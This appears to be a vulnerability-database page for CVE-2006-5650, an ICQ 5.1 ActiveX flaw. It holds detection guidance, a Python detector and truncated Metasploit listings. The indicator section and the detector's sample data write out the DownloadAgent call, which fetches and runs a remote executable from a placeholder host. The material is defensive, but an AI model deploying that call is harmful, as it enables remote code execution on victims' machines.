CVE-2006-5650
Published 2006-11-07
Priority: P3 · 54 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 66.37% (99.2th percentile)
The ICQPhone.SipxPhoneManager ActiveX control in America Online ICQ 5.1 allows remote attackers to download and execute arbitrary code via the DownloadAgent function, as demonstrated using an ICQ avatar.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aol | icq | — | — |
Detection & IOCs
Command: new ActiveXObject('ICQPhone.SipxPhoneManager.1'); .DownloadAgent("<payload_url>/<exe>.exe");
- Detect instantiation of the vulnerable ActiveX control by its ProgID 'ICQPhone.SipxPhoneManager.1' or CLSID '54BDE6EC-F42F-4500-AC46-905177444300' in HTML/script content delivered over HTTP.
- Inspect HTTP responses for calls to the DownloadAgent method on the ICQPhone.SipxPhoneManager ActiveX object; the method is used to fetch and execute a remote .exe payload.
- HTTP response serving the exploit delivers 'Content-Type: application/octet-stream' for the PE payload; correlate with a prior HTML page referencing CLSID 54BDE6EC-F42F-4500-AC46-905177444300 to identify the full attack chain.
- The exploit can be triggered via an ICQ message (e.g., a malicious avatar), so monitor ICQ client network traffic for outbound HTTP requests to attacker-controlled hosts fetching .exe files shortly after message receipt.
- The Metasploit module uses randomised variable names (rand_text_alpha) and randomised uppercase .exe filenames (rand_text_alpha_upper), so static string matching on variable names or filenames in the HTML payload will not be reliable; detection should focus on the stable ProgID/CLSID and DownloadAgent method call pattern.
- The module's URIPATH defaults to '/' and the payload is served under a '/PAYLOAD' sub-path; the actual URI is configurable by the attacker, so path-based detection alone is insufficient.
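The detection notes above, combined into one content-based check (an added example, not code from this page or from the Metasploit project): it matches only the stable ProgID/CLSID and the DownloadAgent call, then correlates the URL passed to DownloadAgent with a later application/octet-stream response to the same client. The record fields (client, url, content_type, body), the function names and the sample capture are assumptions made for the example.

```python
import re

# Stable indicators named on this page; variable and file names are randomised.
CONTROL_RE = re.compile(
    r"ICQPhone\.SipxPhoneManager|54BDE6EC-F42F-4500-AC46-905177444300", re.I)
# Match the method on any identifier and capture its quoted URL argument.
DOWNLOAD_RE = re.compile(r"\.\s*DownloadAgent\s*\(\s*([\"'])(.*?)\1", re.I | re.S)

def scan_html(body: bytes) -> dict:
    """Report control instantiation and DownloadAgent targets in one body."""
    text = body.decode("latin-1")
    return {"control": bool(CONTROL_RE.search(text)),
            "urls": [m.group(2) for m in DOWNLOAD_RE.finditer(text)]}

def correlate(responses: list) -> list:
    """Walk responses in capture order; alert when a client that received a
    page calling DownloadAgent later receives that URL as octet-stream."""
    pending = {}   # client -> set of URLs passed to DownloadAgent
    alerts = []
    for r in responses:
        ctype = r["content_type"].split(";")[0].strip().lower()
        if ctype == "text/html":
            hit = scan_html(r["body"])
            if hit["control"] and hit["urls"]:
                pending.setdefault(r["client"], set()).update(hit["urls"])
        elif ctype == "application/octet-stream":
            if r["url"] in pending.get(r["client"], set()):
                alerts.append({"client": r["client"], "payload_url": r["url"],
                               "pe_header": r["body"][:2] == b"MZ"})
    return alerts

# Constructed sample capture (hosts, names and bytes are made up).
SAMPLE = [
    {"client": "10.0.0.5", "url": "http://site.example.test/",
     "content_type": "text/html",
     "body": b"<script>var qZxKp = new ActiveXObject('ICQPhone.SipxPhoneManager.1');"
             b' qZxKp.DownloadAgent("http://site.example.test/PAYLOAD/KJHGQW.exe");</script>'},
    {"client": "10.0.0.5", "url": "http://site.example.test/PAYLOAD/KJHGQW.exe",
     "content_type": "application/octet-stream", "body": b"MZ\x90\x00"},
    {"client": "10.0.0.9", "url": "http://cdn.example.test/setup.exe",
     "content_type": "application/octet-stream", "body": b"MZ\x90\x00"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE):
        print(alert)
```

The third sample record is an unrelated executable download with no preceding control page, so it raises no alert; matching on the captured URL rather than on '/PAYLOAD' keeps the check independent of the configurable path.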
No detection rules found.
Exploit-DB
America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)
exploitdb·2010-11-24
---
##
# $Id: aol_icq_downloadagent.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module allows remote attackers to download and execute arbitrary files
on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Rev
Exploit-DB
America Online ICQ 5.1 - ActiveX Control Remote Code Execution
exploitdb·2006-11-06
---
source: https://www.securityfocus.com/bid/20930/info
The America Online ICQ ActiveX Control is prone to a remote code-execution vulnerability.
An attacker could exploit this issue simply by sending a message to a victim ICQ user. Successful exploits could allow the attacker to execute arbitrary code.
The ICQPhone.SipxPhoneManager ActiveX control with the following CLSID is affected:
54BDE6EC-F42F-4500-AC46-905177444300
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3
Metasploit
America Online ICQ ActiveX Control Arbitrary File Download and Execute
metasploit
This module allows remote attackers to download and execute arbitrary files on a user's system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
No writeups or analysis indexed.
- http://secunia.com/advisories/22670
- http://securityreason.com/securityalert/1830
- http://securitytracker.com/id?1017163
- http://www.securityfocus.com/archive/1/450726/100/0/threaded
- http://www.securityfocus.com/bid/20930
- http://www.vupen.com/english/advisories/2006/4362
- http://www.zerodayinitiative.com/advisories/ZDI-06-037.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30059